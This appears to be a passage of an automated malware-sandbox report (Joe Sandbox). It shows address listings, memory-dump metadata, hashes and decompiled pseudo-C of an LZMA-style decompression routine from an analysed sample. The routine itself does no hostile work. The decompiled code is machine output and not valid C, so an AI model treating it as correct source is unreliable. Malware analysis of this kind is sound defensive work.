                                    0x00407410
                                    0x004073e2
                                    0x004073e2
                                    0x004073f1
                                    0x004073f5
                                    0x004073f5
                                    0x0040741a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406d5f
                                    0x00406d61
                                    0x00406d64
                                    0x00406dd5
                                    0x00406dd8
                                    0x00406ddb
                                    0x00406de2
                                    0x00406dec
                                    0x004073cb
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x004073cb
                                    0x00406d66
                                    0x00406d6a
                                    0x00406d6d
                                    0x00406d6f
                                    0x00406d72
                                    0x00406d75
                                    0x00406d77
                                    0x00406d7a
                                    0x00406d7c
                                    0x00406d81
                                    0x00406d84
                                    0x00406d87
                                    0x00406d8b
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9c
                                    0x00406da0
                                    0x00406da8
                                    0x00406da8
                                    0x00406da8
                                    0x00406da2
                                    0x00406da2
                                    0x00406da2
                                    0x00406d97
                                    0x00406d97
                                    0x00406d97
                                    0x00406dac
                                    0x00406daf
                                    0x00406dcd
                                    0x00406dcf
                                    0x00000000
                                    0x00406db1
                                    0x00406db1
                                    0x00406db4
                                    0x00406db7
                                    0x00406dba
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbf
                                    0x00406dc2
                                    0x00406dc4
                                    0x00406dc5
                                    0x00406dc8
                                    0x00000000
                                    0x00406dc8
                                    0x00000000
                                    0x00406ffe
                                    0x00407002
                                    0x00407020
                                    0x00407023
                                    0x0040702a
                                    0x0040702d
                                    0x00407030
                                    0x00407033
                                    0x00407036
                                    0x00407039
                                    0x0040703b
                                    0x00407042
                                    0x00407043
                                    0x00407045
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x0040704e
                                    0x00407053
                                    0x00000000
                                    0x00407053
                                    0x00407004
                                    0x00407007
                                    0x0040700a
                                    0x00407014
                                    0x004073cb
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x00000000
                                    0x00407068
                                    0x0040706c
                                    0x0040708f
                                    0x00407092
                                    0x00407095
                                    0x0040709f
                                    0x0040706e
                                    0x0040706e
                                    0x00407071
                                    0x00407074
                                    0x00407077
                                    0x00407084
                                    0x00407087
                                    0x00407087
                                    0x004073cb
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x00000000
                                    0x004070ab
                                    0x004070af
                                    0x00000000
                                    0x00000000
                                    0x004070b5
                                    0x004070b9
                                    0x00000000
                                    0x00000000
                                    0x004070bf
                                    0x004070c1
                                    0x004070c5
                                    0x004070c5
                                    0x004070c8
                                    0x004070cc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00407143
                                    0x00407147
                                    0x0040714e
                                    0x00407151
                                    0x00407154
                                    0x00407149
                                    0x00407149
                                    0x00407149
                                    0x00407157
                                    0x0040715a
                                    0x00000000
                                    0x00000000
                                    0x00407203
                                    0x00407203
                                    0x00407207
                                    0x004075a5
                                    0x00000000
                                    0x004075a5
                                    0x0040720d
                                    0x00407210
                                    0x00407213
                                    0x00407217
                                    0x0040721a
                                    0x00407220
                                    0x00407222
                                    0x00407222
                                    0x00407222
                                    0x00407225
                                    0x00407228
                                    0x00000000
                                    0x00000000
                                    0x00406df8
                                    0x00406df8
                                    0x00406dfc
                                    0x00407569
                                    0x00000000
                                    0x00407569
                                    0x00406e02
                                    0x00406e05
                                    0x00406e08
                                    0x00406e0c
                                    0x00406e0f
                                    0x00406e15
                                    0x00406e17
                                    0x00406e17
                                    0x00406e17
                                    0x00406e1a
                                    0x00406e1d
                                    0x00406e1d
                                    0x00406e20
                                    0x00406e23
                                    0x00000000
                                    0x00000000
                                    0x00406e29
                                    0x00406e2f
                                    0x00000000
                                    0x00000000
                                    0x00406e35
                                    0x00406e35
                                    0x00406e39
                                    0x00406e3c
                                    0x00406e3f
                                    0x00406e42
                                    0x00406e45
                                    0x00406e46
                                    0x00406e49
                                    0x00406e4b
                                    0x00406e51
                                    0x00406e54
                                    0x00406e57
                                    0x00406e5a
                                    0x00406e5d
                                    0x00406e60
                                    0x00406e63
                                    0x00406e7f
                                    0x00406e82
                                    0x00406e85
                                    0x00406e88
                                    0x00406e8f
                                    0x00406e93
                                    0x00406e95
                                    0x00406e99
                                    0x00406e65
                                    0x00406e65
                                    0x00406e69
                                    0x00406e71
                                    0x00406e76
                                    0x00406e78
                                    0x00406e7a
                                    0x00406e7a
                                    0x00406e9c
                                    0x00406ea3
                                    0x00406ea6
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eb1
                                    0x00406eb1
                                    0x00406eb5
                                    0x00407575
                                    0x00000000
                                    0x00407575
                                    0x00406ebb
                                    0x00406ebe
                                    0x00406ec1
                                    0x00406ec5
                                    0x00406ec8
                                    0x00406ece
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed3
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406edc
                                    0x00000000
                                    0x00000000
                                    0x00406ede
                                    0x00406ee1
                                    0x00406ee4
                                    0x00406ee7
                                    0x00406eea
                                    0x00406eed
                                    0x00406ef0
                                    0x00406ef3
                                    0x00406ef6
                                    0x00406ef9
                                    0x00406efc
                                    0x00406f14
                                    0x00406f17
                                    0x00406f1a
                                    0x00406f1d
                                    0x00406f1d
                                    0x00406f20
                                    0x00406f24
                                    0x00406f26
                                    0x00406efe
                                    0x00406efe
                                    0x00406f06
                                    0x00406f0b
                                    0x00406f0d
                                    0x00406f0f
                                    0x00406f0f
                                    0x00406f29
                                    0x00406f30
                                    0x00406f33
                                    0x00000000
                                    0x00406f35
                                    0x00000000
                                    0x00406f35
                                    0x00406f33
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00000000
                                    0x00000000
                                    0x00406f75
                                    0x00406f75
                                    0x00406f79
                                    0x00407581
                                    0x00000000
                                    0x00407581
                                    0x00406f7f
                                    0x00406f82
                                    0x00406f85
                                    0x00406f89
                                    0x00406f8c
                                    0x00406f92
                                    0x00406f94
                                    0x00406f94
                                    0x00406f94
                                    0x00406f97
                                    0x00406f9a
                                    0x00406f9a
                                    0x00406fa0
                                    0x00406f3e
                                    0x00406f3e
                                    0x00406f41
                                    0x00000000
                                    0x00406f41
                                    0x00406fa2
                                    0x00406fa2
                                    0x00406fa5
                                    0x00406fa8
                                    0x00406fab
                                    0x00406fae
                                    0x00406fb1
                                    0x00406fb4
                                    0x00406fb7
                                    0x00406fba
                                    0x00406fbd
                                    0x00406fc0
                                    0x00406fd8
                                    0x00406fdb
                                    0x00406fde
                                    0x00406fe1
                                    0x00406fe1
                                    0x00406fe4
                                    0x00406fe8
                                    0x00406fea
                                    0x00406fc2
                                    0x00406fc2
                                    0x00406fca
                                    0x00406fcf
                                    0x00406fd1
                                    0x00406fd3
                                    0x00406fd3
                                    0x00406fed
                                    0x00406ff4
                                    0x00406ff7
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00407286
                                    0x00407286
                                    0x0040728a
                                    0x004075b1
                                    0x00000000
                                    0x004075b1
                                    0x00407290
                                    0x00407293
                                    0x00407296
                                    0x0040729a
                                    0x0040729d
                                    0x004072a3
                                    0x004072a5
                                    0x004072a5
                                    0x004072a5
                                    0x004072a8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00407395
                                    0x00407399
                                    0x004073bb
                                    0x004073be
                                    0x004073c8
                                    0x004073cb
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x004073cb
                                    0x0040739b
                                    0x0040739e
                                    0x004073a2
                                    0x004073a5
                                    0x004073a5
                                    0x004073a8
                                    0x00000000
                                    0x00000000
                                    0x00407452
                                    0x00407456
                                    0x00407474
                                    0x00407474
                                    0x00407474
                                    0x0040747b
                                    0x00407482
                                    0x00407489
                                    0x00407489
                                    0x00000000
                                    0x00407489
                                    0x00407458
                                    0x0040745b
                                    0x0040745e
                                    0x00407461
                                    0x00407468
                                    0x004073ac
                                    0x004073ac
                                    0x004073af
                                    0x00000000
                                    0x00000000
                                    0x00407543
                                    0x00407546
                                    0x00407447
                                    0x00000000
                                    0x00000000
                                    0x0040717d
                                    0x0040717f
                                    0x00407186
                                    0x00407187
                                    0x00407189
                                    0x0040718c
                                    0x00000000
                                    0x00000000
                                    0x00407194
                                    0x00407197
                                    0x0040719a
                                    0x0040719c
                                    0x0040719e
                                    0x0040719e
                                    0x0040719f
                                    0x004071a2
                                    0x004071a9
                                    0x004071ac
                                    0x004071ba
                                    0x00000000
                                    0x00000000
                                    0x00407490
                                    0x00407490
                                    0x00407493
                                    0x0040749a
                                    0x00000000
                                    0x00000000
                                    0x0040749f
                                    0x0040749f
                                    0x004074a3
                                    0x004075db
                                    0x00000000
                                    0x004075db
                                    0x004074a9
                                    0x004074ac
                                    0x004074af
                                    0x004074b3
                                    0x004074b6
                                    0x004074bc
                                    0x004074be
                                    0x004074be
                                    0x004074be
                                    0x004074c1
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c7
                                    0x004074c7
                                    0x004074cb
                                    0x0040752b
                                    0x0040752e
                                    0x00407533
                                    0x00407534
                                    0x00407536
                                    0x00407538
                                    0x0040753b
                                    0x00407447
                                    0x00407447
                                    0x00000000
                                    0x0040744d
                                    0x00407447
                                    0x004074cd
                                    0x004074d3
                                    0x004074d6
                                    0x004074d9
                                    0x004074dc
                                    0x004074df
                                    0x004074e2
                                    0x004074e5
                                    0x004074e8
                                    0x004074eb
                                    0x004074ee
                                    0x00407507
                                    0x0040750a
                                    0x0040750d
                                    0x00407510
                                    0x00407514
                                    0x00407516
                                    0x00407516
                                    0x00407517
                                    0x0040751a
                                    0x004074f0
                                    0x004074f0
                                    0x004074f8
                                    0x004074fd
                                    0x004074ff
                                    0x00407502
                                    0x00407502
                                    0x0040751d
                                    0x00407524
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x004071c2
                                    0x004071c5
                                    0x004071fb
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732e
                                    0x0040732e
                                    0x00407331
                                    0x00407333
                                    0x004075bd
                                    0x00000000
                                    0x004075bd
                                    0x00407339
                                    0x0040733c
                                    0x00000000
                                    0x00000000
                                    0x00407342
                                    0x00407346
                                    0x00407349
                                    0x00407349
                                    0x00407349
                                    0x00000000
                                    0x00407349
                                    0x004071c7
                                    0x004071c9
                                    0x004071cb
                                    0x004071cd
                                    0x004071d0
                                    0x004071d1
                                    0x004071d3
                                    0x004071d5
                                    0x004071d8
                                    0x004071db
                                    0x004071f1
                                    0x004071f6
                                    0x0040722e
                                    0x0040722e
                                    0x00407232
                                    0x0040725e
                                    0x00407260
                                    0x00407267
                                    0x0040726a
                                    0x0040726d
                                    0x0040726d
                                    0x00407272
                                    0x00407272
                                    0x00407274
                                    0x00407277
                                    0x0040727e
                                    0x00407281
                                    0x004072ae
                                    0x004072ae
                                    0x004072b1
                                    0x004072b4
                                    0x00407328
                                    0x00407328
                                    0x00407328
                                    0x00000000
                                    0x00407328
                                    0x004072b6
                                    0x004072bc
                                    0x004072bf
                                    0x004072c2
                                    0x004072c5
                                    0x004072c8
                                    0x004072cb
                                    0x004072ce
                                    0x004072d1
                                    0x004072d4
                                    0x004072d7
                                    0x004072f0
                                    0x004072f2
                                    0x004072f5
                                    0x004072f6
                                    0x004072f9
                                    0x004072fb
                                    0x004072fe
                                    0x00407300
                                    0x00407302
                                    0x00407305
                                    0x00407307
                                    0x0040730a
                                    0x0040730e
                                    0x00407310
                                    0x00407310
                                    0x00407311
                                    0x00407314
                                    0x00407317
                                    0x004072d9
                                    0x004072d9
                                    0x004072e1
                                    0x004072e6
                                    0x004072e8
                                    0x004072eb
                                    0x004072eb
                                    0x0040731a
                                    0x00407321
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x00000000
                                    0x00407323
                                    0x00000000
                                    0x00407323
                                    0x00407321
                                    0x00407234
                                    0x00407237
                                    0x00407239
                                    0x0040723c
                                    0x0040723f
                                    0x00407242
                                    0x00407244
                                    0x00407247
                                    0x0040724a
                                    0x0040724a
                                    0x0040724d
                                    0x0040724d
                                    0x00407250
                                    0x00407257
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x00000000
                                    0x00407259
                                    0x00000000
                                    0x00407259
                                    0x00407257
                                    0x004071dd
                                    0x004071e0
                                    0x004071e2
                                    0x004071e5
                                    0x00000000
                                    0x00000000
                                    0x00406f44
                                    0x00406f44
                                    0x00406f48
                                    0x0040758d
                                    0x00000000
                                    0x0040758d
                                    0x00406f4e
                                    0x00406f51
                                    0x00406f54
                                    0x00406f57
                                    0x00406f5a
                                    0x00406f5d
                                    0x00406f60
                                    0x00406f62
                                    0x00406f65
                                    0x00406f68
                                    0x00406f6b
                                    0x00406f6d
                                    0x00406f6d
                                    0x00406f6d
                                    0x00000000
                                    0x00000000
                                    0x004070cf
                                    0x004070cf
                                    0x004070d3
                                    0x00407599
                                    0x00000000
                                    0x00407599
                                    0x004070d9
                                    0x004070dc
                                    0x004070df
                                    0x004070e2
                                    0x004070e4
                                    0x004070e4
                                    0x004070e4
                                    0x004070e7
                                    0x004070ea
                                    0x004070ed
                                    0x004070f0
                                    0x004070f3
                                    0x004070f6
                                    0x004070f7
                                    0x004070f9
                                    0x004070f9
                                    0x004070f9
                                    0x004070fc
                                    0x004070ff
                                    0x00407102
                                    0x00407105
                                    0x00407105
                                    0x00407105
                                    0x00407108
                                    0x0040710a
                                    0x0040710a
                                    0x00000000
                                    0x00000000
                                    0x0040734c
                                    0x0040734c
                                    0x0040734c
                                    0x00407350
                                    0x00000000
                                    0x00000000
                                    0x00407356
                                    0x00407359
                                    0x0040735c
                                    0x0040735f
                                    0x00407361
                                    0x00407361
                                    0x00407361
                                    0x00407364
                                    0x00407367
                                    0x0040736a
                                    0x0040736d
                                    0x00407370
                                    0x00407373
                                    0x00407374
                                    0x00407376
                                    0x00407376
                                    0x00407376
                                    0x00407379
                                    0x0040737c
                                    0x0040737f
                                    0x00407382
                                    0x00407385
                                    0x00407389
                                    0x0040738b
                                    0x0040738e
                                    0x00000000
                                    0x00407390
                                    0x0040710d
                                    0x0040710d
                                    0x00000000
                                    0x0040710d
                                    0x0040738e
                                    0x004075c3
                                    0x00000000
                                    0x00000000
                                    0x00406bf2
                                    0x004075fa
                                    0x004075fa
                                    0x00000000
                                    0x004075fa
                                    0x00407447
                                    0x004073ce
                                    0x004073cb
                                    0x00000000
                                    0x00407120

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                    • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                    • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                    • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 98%
                                    			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
